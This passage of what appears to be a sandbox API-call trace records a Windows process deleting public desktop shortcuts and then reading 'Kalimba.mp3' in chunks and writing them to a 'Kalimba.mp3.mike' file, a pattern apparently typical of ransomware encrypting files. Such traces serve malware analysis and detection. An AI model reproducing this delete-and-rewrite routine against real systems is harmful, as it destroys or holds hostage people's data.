(in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aed40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0159.366] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0159.366] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0159.366] CoTaskMemFree (pv=0x508980) [0159.366] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0159.367] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0159.367] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Desktop\\Adobe Reader X.lnk", nBufferLength=0x105, lpBuffer=0x2aec84, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Desktop\\Adobe Reader X.lnk", lpFilePart=0x0) returned 0x2a [0159.371] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Desktop\\Adobe Reader X.lnk", dwFileAttributes=0x80) returned 1 [0159.371] DeleteFileW (lpFileName="C:\\Users\\Public\\Desktop\\Adobe Reader X.lnk" (normalized: "c:\\users\\public\\desktop\\adobe reader x.lnk")) returned 1 [0159.374] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0159.375] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Desktop\\Google Chrome.lnk", nBufferLength=0x105, lpBuffer=0x2aec84, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Desktop\\Google Chrome.lnk", lpFilePart=0x0) returned 0x29 [0159.378] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Desktop\\Google Chrome.lnk", dwFileAttributes=0x80) returned 1 [0159.378] DeleteFileW (lpFileName="C:\\Users\\Public\\Desktop\\Google Chrome.lnk" (normalized: "c:\\users\\public\\desktop\\google chrome.lnk")) returned 1 [0159.381] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0159.382] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Desktop\\Mozilla Firefox.lnk", nBufferLength=0x105, lpBuffer=0x2aec84, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Desktop\\Mozilla Firefox.lnk", lpFilePart=0x0) returned 0x2b [0159.385] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Desktop\\Mozilla Firefox.lnk", dwFileAttributes=0x80) returned 1 [0159.385] DeleteFileW (lpFileName="C:\\Users\\Public\\Desktop\\Mozilla Firefox.lnk" (normalized: "c:\\users\\public\\desktop\\mozilla firefox.lnk")) returned 1 [0159.388] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0159.388] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0159.388] CoTaskMemFree (pv=0x508980) [0159.388] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0159.389] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0159.389] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0159.389] CoTaskMemFree (pv=0x508980) [0159.389] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0159.390] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0159.390] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0159.391] CoTaskMemFree (pv=0x508980) [0159.391] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0159.392] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0159.392] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0159.392] CoTaskMemFree (pv=0x508980) [0159.392] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0159.394] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0159.394] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0159.394] CoTaskMemFree (pv=0x508980) [0159.394] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0159.395] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0159.395] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0159.395] CoTaskMemFree (pv=0x508980) [0159.395] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0159.395] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0159.395] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0159.396] CoTaskMemFree (pv=0x508980) [0159.396] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0159.396] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0159.397] CoTaskMemFree (pv=0x508980) [0159.397] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0159.397] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0159.397] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0159.397] CoTaskMemFree (pv=0x508980) [0159.397] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0159.402] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0159.403] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3", lpFilePart=0x0) returned 0x2e [0160.567] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=5519360, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x543800 [0160.567] ReadFile (in: hFile=0x1c8, lpBuffer=0x20ddefc, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x20ddefc*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0160.567] CloseHandle (hObject=0x1c8) returned 1 [0160.568] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0160.568] CreateFileW (lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3.mike" (normalized: "c:\\users\\public\\music\\sample music\\kalimba.mp3.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0160.569] GetFileType (hFile=0x1c8) returned 0x1 [0160.569] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0160.569] GetFileType (hFile=0x1c8) returned 0x1 [0160.569] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x543a20 [0160.569] WriteFile (in: hFile=0x1c8, lpBuffer=0x20ec090*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af0dc, lpOverlapped=0x0 | out: lpBuffer=0x20ec090*, lpNumberOfBytesWritten=0x2af0dc*=0x2800, lpOverlapped=0x0) returned 1 [0160.569] CloseHandle (hObject=0x1c8) returned 1 [0160.569] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3", lpFilePart=0x0) returned 0x2e [0160.569] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0160.569] CreateFileW (lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3" (normalized: "c:\\users\\public\\music\\sample music\\kalimba.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0160.570] GetFileType (hFile=0x1c8) returned 0x1 [0160.570] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0160.570] GetFileType (hFile=0x1c8) returned 0x1 [0160.570] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=5529600, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x546000 [0160.570] ReadFile (in: hFile=0x1c8, lpBuffer=0x20eea88, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x20eea88*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0160.570] CloseHandle (hObject=0x1c8) returned 1 [0160.571] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0160.571] CreateFileW (lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3.mike" (normalized: "c:\\users\\public\\music\\sample music\\kalimba.mp3.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0160.571] GetFileType (hFile=0x1c8) returned 0x1 [0160.571] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0160.571] GetFileType (hFile=0x1c8) returned 0x1 [0160.571] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x546220 [0160.571] WriteFile (in: hFile=0x1c8, lpBuffer=0x20f8ff0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af0dc, lpOverlapped=0x0 | out: lpBuffer=0x20f8ff0*, lpNumberOfBytesWritten=0x2af0dc*=0x2800, lpOverlapped=0x0) returned 1 [0160.572] CloseHandle (hObject=0x1c8) returned 1 [0160.572] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3", lpFilePart=0x0) returned 0x2e [0160.572] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0160.572] CreateFileW (lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3" (normalized: "c:\\users\\public\\music\\sample music\\kalimba.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0160.572] GetFileType (hFile=0x1c8) returned 0x1 [0160.572] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0160.572] GetFileType (hFile=0x1c8) returned 0x1 [0160.572] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=5539840, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x548800 [0160.572] ReadFile (in: hFile=0x1c8, lpBuffer=0x20fb9e8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x20fb9e8*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0160.573] CloseHandle (hObject=0x1c8) returned 1 [0160.574] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0160.574] CreateFileW (lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3.mike" (normalized: "c:\\users\\public\\music\\sample music\\kalimba.mp3.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0160.574] GetFileType (hFile=0x1c8) returned 0x1 [0160.574] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0160.574] GetFileType (hFile=0x1c8) returned 0x1 [0160.574] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x548a20 [0160.574] WriteFile (in: hFile=0x1c8, lpBuffer=0x2105f50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af0dc, lpOverlapped=0x0 | out: lpBuffer=0x2105f50*, lpNumberOfBytesWritten=0x2af0dc*=0x2800, lpOverlapped=0x0) returned 1 [0160.574] CloseHandle (hObject=0x1c8) returned 1 [0160.574] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3", lpFilePart=0x0) returned 0x2e [0160.575] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0160.575] CreateFileW (lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3" (normalized: "c:\\users\\public\\music\\sample music\\kalimba.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0160.575] GetFileType (hFile=0x1c8) returned 0x1 [0160.575] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0160.575] GetFileType (hFile=0x1c8) returned 0x1 [0160.575] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=5550080, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x54b000 [0160.575] ReadFile (in: hFile=0x1c8, lpBuffer=0x2108948, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x2108948*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0160.576] CloseHandle (hObject=0x1c8) returned 1 [0160.576] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0160.576] CreateFileW (lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3.mike" (normalized: "c:\\users\\public\\music\\sample music\\kalimba.mp3.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0160.576] GetFileType (hFile=0x1c8) returned 0x1 [0160.576] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0160.576] GetFileType (hFile=0x1c8) returned 0x1 [0160.576] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x54b220 [0160.576] WriteFile (in: hFile=0x1c8, lpBuffer=0x2112eb0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af0dc, lpOverlapped=0x0 | out: lpBuffer=0x2112eb0*, lpNumberOfBytesWritten=0x2af0dc*=0x2800, lpOverlapped=0x0) returned 1 [0160.577] CloseHandle (hObject=0x1c8) returned 1 [0160.577] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3", lpFilePart=0x0) returned 0x2e [0160.577] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0160.577] CreateFileW (lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3" (normalized: "c:\\users\\public\\music\\sample music\\kalimba.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0160.577] GetFileType (hFile=0x1c8) returned 0x1 [0160.577] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0160.577] GetFileType (hFile=0x1c8) returned 0x1 [0160.577] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=5560320, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x54d800 [0160.577] ReadFile (in: hFile=0x1c8, lpBuffer=0x21158a8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x21158a8*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0160.578] CloseHandle (hObject=0x1c8) returned 1 [0160.578] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0160.579] CreateFileW (lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3.mike" (normalized: "c:\\users\\public\\music\\sample music\\kalimba.mp3.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0160.579] GetFileType (hFile=0x1c8) returned 0x1 [0160.579] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0160.579] GetFileType (hFile=0x1c8) returned 0x1 [0160.579] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x54da20 [0160.579] WriteFile (in: hFile=0x1c8, lpBuffer=0x211fe10*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af0dc, lpOverlapped=0x0 | out: lpBuffer=0x211fe10*, lpNumberOfBytesWritten=0x2af0dc*=0x2800, lpOverlapped=0x0) returned 1 [0160.579] CloseHandle (hObject=0x1c8) returned 1 [0160.579] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3", lpFilePart=0x0) returned 0x2e [0160.579] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0160.579] CreateFileW (lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3" (normalized: "c:\\users\\public\\music\\sample music\\kalimba.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0160.580] GetFileType (hFile=0x1c8) returned 0x1 [0160.580] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0160.580] GetFileType (hFile=0x1c8) returned 0x1 [0160.580] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=5570560, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x550000 [0160.580] ReadFile (in: hFile=0x1c8, lpBuffer=0x2122808, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x2122808*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0160.584] CloseHandle (hObject=0x1c8) returned 1 [0160.585] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0160.585] CreateFileW (lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3.mike" (normalized: "c:\\users\\public\\music\\sample music\\kalimba.mp3.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0160.585] GetFileType (hFile=0x1c8) returned 0x1 [0160.585] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0160.585] GetFileType (hFile=0x1c8) returned 0x1 [0160.585] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x550220 [0160.585] WriteFile (in: hFile=0x1c8, lpBuffer=0x212cd70*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af0dc, lpOverlapped=0x0 | out: lpBuffer=0x212cd70*, lpNumberOfBytesWritten=0x2af0dc*=0x2800, lpOverlapped=0x0) returned 1 [0160.586] CloseHandle (hObject=0x1c8) returned 1 [0160.586] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3", lpFilePart=0x0) returned 0x2e [0160.586] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0160.586] CreateFileW (lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3" (normalized: "c:\\users\\public\\music\\sample music\\kalimba.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0160.586] GetFileType (hFile=0x1c8) returned 0x1 [0160.586] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0160.586] GetFileType (hFile=0x1c8) returned 0x1 [0160.586] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=5580800, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x552800 [0160.586] ReadFile (in: hFile=0x1c8, lpBuffer=0x212f768, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x212f768*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0160.587] CloseHandle (hObject=0x1c8) returned 1 [0160.587] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0160.587] CreateFileW (lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3.mike" (normalized: "c:\\users\\public\\music\\sample music\\kalimba.mp3.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0160.587] GetFileType (hFile=0x1c8) returned 0x1 [0160.587] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0160.588] GetFileType (hFile=0x1c8) returned 0x1 [0160.588] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x552a20 [0160.588] WriteFile (in: hFile=0x1c8, lpBuffer=0x2139cd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af0dc, lpOverlapped=0x0 | out: lpBuffer=0x2139cd0*, lpNumberOfBytesWritten=0x2af0dc*=0x2800, lpOverlapped=0x0) returned 1 [0160.588] CloseHandle (hObject=0x1c8) returned 1 [0160.588] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3", lpFilePart=0x0) returned 0x2e [0160.588] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0160.588] CreateFileW (lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3" (normalized: "c:\\users\\public\\music\\sample music\\kalimba.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0160.588] GetFileType (hFile=0x1c8) returned 0x1 [0160.588] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0160.588] GetFileType (hFile=0x1c8) returned 0x1 [0160.588] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=5591040, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x555000 [0160.588] ReadFile (in: hFile=0x1c8, lpBuffer=0x213c6c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x213c6c8*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0160.589] CloseHandle (hObject=0x1c8) returned 1 [0160.590] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0160.590] CreateFileW (lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3.mike" (normalized: "c:\\users\\public\\music\\sample music\\kalimba.mp3.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0160.590] GetFileType (hFile=0x1c8) returned 0x1 [0160.590] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0160.590] GetFileType (hFile=0x1c8) returned 0x1 [0160.590] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x555220 [0160.590] WriteFile (in: hFile=0x1c8, lpBuffer=0x2146c30*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af0dc, lpOverlapped=0x0 | out: lpBuffer=0x2146c30*, lpNumberOfBytesWritten=0x2af0dc*=0x2800, lpOverlapped=0x0) returned 1 [0160.590] CloseHandle (hObject=0x1c8) returned 1 [0160.590] GetFullPathNameW (in: 